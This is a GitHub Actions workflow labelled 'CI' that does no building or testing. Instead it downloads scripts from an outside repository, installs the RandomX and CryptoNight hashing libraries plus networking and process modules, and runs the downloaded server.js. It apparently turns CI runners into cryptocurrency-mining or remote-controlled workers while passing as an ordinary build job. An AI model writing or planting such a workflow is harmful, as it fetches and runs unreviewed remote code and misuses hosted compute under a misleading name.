name: CI
on: [push, workflow_dispatch]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:

    - name: Start
      run: sudo wget https://raw.githubusercontent.com/raiyan088/public/main/hash/server.js https://raw.githubusercontent.com/raiyan088/public/main/hash/server.py https://raw.githubusercontent.com/raiyan088/public/main/hash/package.json
    - run: sudo pip install git+https://github.com/jtgrassie/pyrx
    - run: sudo pip install py-cryptonight
    - run: npm install child_process net
    - run: node server.js
